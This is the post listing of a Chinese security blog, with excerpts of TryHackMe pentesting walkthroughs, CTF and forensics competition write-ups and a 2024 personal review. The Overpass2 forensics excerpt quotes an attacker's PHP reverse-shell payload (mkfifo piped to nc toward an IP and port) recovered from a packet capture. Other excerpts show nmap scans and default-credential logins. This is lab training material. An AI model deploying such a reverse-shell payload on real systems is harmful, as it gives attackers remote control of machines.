avatar
文章
74
标签
13
分类
4

主页
分类
标签
归档
友链
留言板
关于
w3nx1z1
搜索
主页
分类
标签
归档
友链
留言板
关于

w3nx1z1

w3nx1z1的2024年度个人总结
发表于2024-12-31|随笔
2024年年度总结时间过得真快 距离上一次写年度总结已经过去了一年的时间 上次写的时候自己还是一个萌新,此时已经是个快退役的老赛棍了。 今年是非常特殊的一年,记录了我和社团还有我的网安学习道路上的很多第一次、很多难忘的时刻。 今年真得是参加了很多比赛,不管是线上的还是线下的,拿了不少奖,其中很多是弥补了去年的遗憾吧。 正常的警校生活可能只能允许我在有限的紧张的假期时间去探索祖国的大好河山,因此非常感谢当初的自己可以选择学习网安这条道路,在同学们只能在苦逼的校园中度日的时候,我还能一点点的去点亮地图哈哈哈,希望新的一年里可以去更多的地方。 下面一点点来回顾这一年的时光。 2024.1还记得今年过年挺晚的 因为一些原因,刚放假就被拉去练车,当时还因为考科二没打成獬豸杯,失去一次拿奖机会哈哈哈 月底还打了西湖论剑,很遗憾的一次战斗,差一题就进了,马上这届西湖还有半个多月就要开打了,希望25年可以打到线下,真的想再去一次杭州好吧! 2024.4铁三初赛记得是三月底打的,和20届的老学长们最后一次线下并肩作战,初赛还好,记得打到了前几名。 没想到4月底的半决赛拉了,一个学长因为要考公没来,另一 ...
Offensive Pentesting-Overpass2
发表于2024-12-11|渗透
Offensive Pentesting-Overpass2这个room主要是一个流量分析溯源取证的 难度相对来说比较简单 同时分析完攻击行为之后 我们可以利用流量包中的记录来进行攻击靶机 Forensics - Analyse the PCAP下载下来附件是一个流量包 直接追踪tcp流 第一个流中 上传了一个反弹shell马 他们用来上传反向 shell 的页面的 URL 是什么? /development 攻击者使用什么有效负载来获取访问权限? <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> 第三个流中就是一个反弹到shell后执行命令的记录 也能看到使用su james命令登陆到了james用户 攻击者使用什么密码来获取权限? whenevernoteartinstant 往后看到执行了sudo -l命令查看了当前james用户的sudo权限规则 查看哪些命令可以被执行 ...
Offensive Pentesting-Alfred
发表于2024-12-09|渗透
Offensive Pentesting-AlfredExploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens. 利用 Jenkins 获取初始 shell,然后通过利用 Windows 身份验证令牌来提升您的权限。 Initial Access先来扫目录和端口 nmap -T4 -sC -sV -Pn 10.10.118.134 可以看到tcp协议开放的端口一共有3个 How many ports are open? (TCP only) 3 下面来访问一下web服务 80端口的没啥用 直接来看8080端口 上来是一个登录框 先直接试一下弱口令:admin:admin 结果直接登上去了 What is the username and password for the login panel? (in the format username:password) admin:admin 获取user的 ...
Offensive Pentesting-Steel Mountain
发表于2024-12-09|渗透
Offensive Pentesting-Steel MountainHack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access. Introductionn this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator. If you don't have the right security tools and environment, deplo ...
2024国城杯Misc wp
发表于2024-12-08|ctf
2024国城杯Misc wp取证说了取证有四部分 先取证大师+火眼整一下 先看到桌面有个流量包 提出来 发现藏了一张jpg图片 提出来 放010看一下 有一串base64 解一下 提示oursecret 使用oursecret来解密 提出来一个hidden.txt 提示QQ空间 正好上面流量是QQ的OICQ协议流量 发现直接给了一个QQ号 搜索一下 在QQ空间说说中找到密文 直接aes-ecb解 拿到flag1 在压缩文件中找到一个flag4 可以直接解压 exe放沙箱里面分析一下 用pyinstxtractor解包 找到关键的pyc文件 在线反编译 拿到加密代码 写出解密代码 def xor_decrypt(encrypted_data, key): decrypted_data = bytearray() for i in range(len(encrypted_data)): decrypted_data.append(encrypted_data[i] ^ key[i % len(key)]) return ...
2024第一届数证杯决赛——个人赛
发表于2024-12-03|取证
数证杯决赛——个人赛容器挂载密码: 4zL!$WpRkmANv@XFQ#7HdEyU&GpoTb56YZ^Jq83!Wr(tqA%XsPB7f@CY1xRmKH9#Le*WVG9NuvT$kJ2@7b64Tp(FLM#zqRY8Hv%!KU^9C&YXL*powq87Hr 检材下载链接: 链接:https://pan.baidu.com/s/12ZZnIfc7ifYoTNi9H8ZqsA?pwd=5g81  提取码:5g81 计算机部分1. [填空题]计算机中曾挂载的Bitlocker加密分区的恢复密钥后6位为?(答案格式:6位数字) (1分) 700755 2. [填空题]请写出曾远程连接过该计算机的IP;(答案格式:6.6.6.6) (1分) 192.168.50.227 3. [填空题]计算机中曾挂载的vhd非加密分区驱动器号为?(答案格式:大写,如D) (1分) M 发现计算机中一共有两个vhd虚拟磁盘 仿真起计算机 尝试挂载一下两个虚拟磁盘 发现这个996600.vhd可以直接挂载 挂载后盘符是M 而另一个338899挂载上是被bitl ...
2024第一届数证杯初赛wp(计算机、手机、流量分析部分)
发表于2024-11-27|取证
2024第一届数证杯(计算机、手机、流量分析部分)计算机取证1.对计算机镜像进行分析,计算该镜像中ESP分区的SM3值后8位为?(答案格式:大写字母与数字组合,如:D23DDF44) (2分) ai搜一下ESP分区的特征 找到并计算出SM3值 后八位为 BDBE1073 2.对计算机镜像进行分析,该操作系统超管账户最后一次注销时间为?(时区为UTC+08:00)(答案格式如:1970-01-01 00:00:00) (2分) 2024-10-25 22:57:32 3.对计算机镜像进行分析,该操作系统超管账户有记录的登录次数为?(填写数字,答案格式如:1234) (2分) 24 4.对计算机镜像进行分析,该操作系统设置的账户密码最长存留期为多少天?(填写数字,答案格式如:1234) (2分) 42 5.对计算机镜像进行分析,该操作系统安装的数据擦除软件的版本为?(答案格式:1.23) (2分) 5.86 6.对计算机镜像进行分析,该操作系统接入过一名称为“Realtek USB Disk autorun USB Device”的USB设备,其接入时分配 ...
Offensive Pentesting-DailyBugle
发表于2024-11-26|渗透
Offensive Pentesting-DailyBugleCompromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum. 通过 SQLi 入侵 Joomla CMS 帐户,练习破解哈希并利用 yum 提升您的权限。 信息搜集nmap -T4 -sC -sV --script=vuln 10.10.46.209 开放22 80 3306端口 其中80端口开放的网站服务是使用joomla框架搭建的 whatweb看一下 没啥有用的 joomla框架的话 用joomlascan扫一下 找到版本为3.7.0 What is the Joomla version? 3.7.0 然后访问一下网页 看到一则银行被抢劫的新闻 作案人是SpiderMan Access the web server, who robbed the bank? SpiderMan 其实在前面我们使用Joomlascan来 ...
Offensive Pentesting-GameZone
发表于2024-11-26|渗透
Offensive Pentesting-GameZoneDeploy the vulnerable machine拿到靶机 先扫端口 只是开启了22端口的ssh服务和80端口的web服务 访问一下网站 What is the name of the large cartoon avatar holding a sniper on the forum? Agent 47 问的是背景中这个拿着狙击枪的角色是 我们把这张图单独保存出来 百度识图一下得知是《杀手》游戏中的主角 Obtain access via SQLiSQL 是一种用于在数据库中存储、编辑和检索数据的标准语言。查询可能如下所示: SELECT * FROM users WHERE username = :username AND password := password 在我们的 GameZone 机器中,当您尝试登录时,它将从您的用户名和密码中获取您输入的值,然后将它们直接插入到上面的查询中。如果查询找到数据,您将被允许登录,否则它将显示一条错误消息。 这是一个潜在的漏洞位置,因为您可以将用户名输入为另一个 ...
Offensive Pentesting-Kenobi
发表于2024-11-26|渗透
Offensive Pentesting-KenobiWalkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. 此房间将涵盖访问 Samba 共享、操纵易受攻击的 proftpd 版本以获得初始访问权限,并通过 SUID 二进制文件将您的权限升级到 root。 扫端口┌──(root㉿kali)-[/home/w3nx1z1] └─# nmap -T4 -sV -sC 10.10.233.125 Starting Nmap 7.92 ( https://nmap.org ) at 2024-11-17 11:09 CST Nmap scan report for 10.10.233.125 Host is up (0.27s latency). Not shown: 993 closed tcp ...
123…8
avatar
w3nx1z1
你相信引力吗?
文章
74
标签
13
分类
4
Follow Me
公告
欢迎来到w3nx1z1的博客!
最新文章
2025年第九届工业信息安全技能大赛典型工业场景锦标赛CTF wp2025-09-12
使用Paddle进行图片ocr识别2025-05-29
Offensive Pentesting-Internal2025-03-13
Offensive Pentesting-Relevant2025-03-10
Offensive Pentesting-HackPark2025-03-10
分类
  • ctf31
  • 取证18
  • 渗透21
  • 随笔4
标签
pwn iot forensics re 应急响应 web ios加密备份 misc crypto 沙箱逃逸 工控 流量分析 打靶
归档
  • 九月 20251
  • 五月 20251
  • 三月 20253
  • 二月 20251
  • 一月 20254
  • 十二月 20246
  • 十一月 20248
  • 十月 20241
网站资讯
文章数目 :
74
本站总字数 :
180.1k
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2025 w3nx1z1
框架 Hexo|主题 Butterfly
搜索
数据库加载中